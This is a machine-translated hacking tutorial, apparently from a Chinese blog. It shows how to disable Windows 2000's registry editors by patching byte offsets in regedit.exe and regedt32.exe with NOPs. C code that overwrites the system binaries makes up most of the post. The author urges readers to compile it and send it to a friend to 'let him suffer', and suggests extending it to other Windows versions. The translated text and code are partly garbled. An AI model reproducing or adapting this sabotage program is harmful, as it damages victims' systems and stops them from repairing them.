Complete registry operation

Author: Feng Ze [E.S. T] Source: http://evilhsu.neeao.com/

Have you ever encountered a registry locked and cannot open the registry for manual repair? HOHO ~~ Many people have a headache for this. I believe that you will know how it works once you are locked:

Modify the value of DisableRegistryTools under [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] to 1.
There are also several ways to unlock the SDK. For example, the app uses an API function to call the Registry to directly Delete the SDK, directly import the REG file, and write a script ............

Today, I will teach you how to write a program to implement alternative locks ~~ Are you curious? Come with me.

Lab environment: windows2000
Objective: To lock the Registry (This method uses the Cracker idea to implement it, and directly allows the program to modify program commands so that the Registry Program cannot be called .)
Implementation Method: C program

First, we need to recompile the redirection commands in regedit.exeand regedt32.exe under winntaccording to the cracker's ideas. How to obtain this information is not our purpose today. I will not detail it here. The following is the redirection address I found in the disassembly:
1.regedit.exe
Offset address: 0x69CA change command: 0x74 0x1A to: 0x90 0x90

2.regedt32.exe
Offset address: 0x10bf2 change command: 0x74 0x52 to: 0x90 0x90

Now we use the program to change the commands of these two offset addresses to 0x90 0x90 (0x90 indicates nop, that is, let the program do nothing and execute the next command) let's see how the program is implemented.

# Include <stdio. h>
# Include <string. h>
Bool scanreg (const char * file, long offset, int length, char * the);/* Function Description */

Main ()
{

Char the [] = {0x90, 0x90 };
Scanreg ("C: \ WINNT \ regedit.exe", 0x69CA, 0x02, the);/* call "modify" regedit.exe "under" winnt", where "0x02" indicates the length of change */

Scanreg ("C: \ WINNT \ ServicePackFiles \ i386 \ regedit.exe", 0x69CA, 0x02, the);/* adjust regedit.exe */

Scanreg ("C: \ WINNT \ system32 \ regedt32.exe", 0x10bf2, 0x02, the);/* call the handler to modify regedt32.exe under system32 */

Scanreg ("C: \ WINNT \ ServicePackFiles \ i386 \ regedt32.exe", 0x10bf2, 0x02, the);/* adjust regedt32.exe */

}
Bool scanreg (const char * file, long offset, int length, char *)
{

FILE * fp = NULL;
Bool result = false;
If (fp = fopen (file, "rb + "))! = NULL)/* open the file for read/write operations */
{
Fseek (fp, offset, 1);/* point the pointer to the defined offset address */
Fwrite (the, length, 1, fp);/* modify the program and replace the command with 0x90 */
Fclose (fp);/* close the file */
Result = true;
}
Return (result );
}

Okay. Compile the program and send it to a friend. Let him suffer. Here is just a demonstration. It is only applicable to the 2000 system. We can analyze the Registry calling programs for each windows system, and then use the API function GetVersionEx (LPOSVERSIONINFO lpVersionInfo) to judge the system in the program, call the corresponding modification function based on the judgment system. HOHO ~~ Isn't that a killer of windows?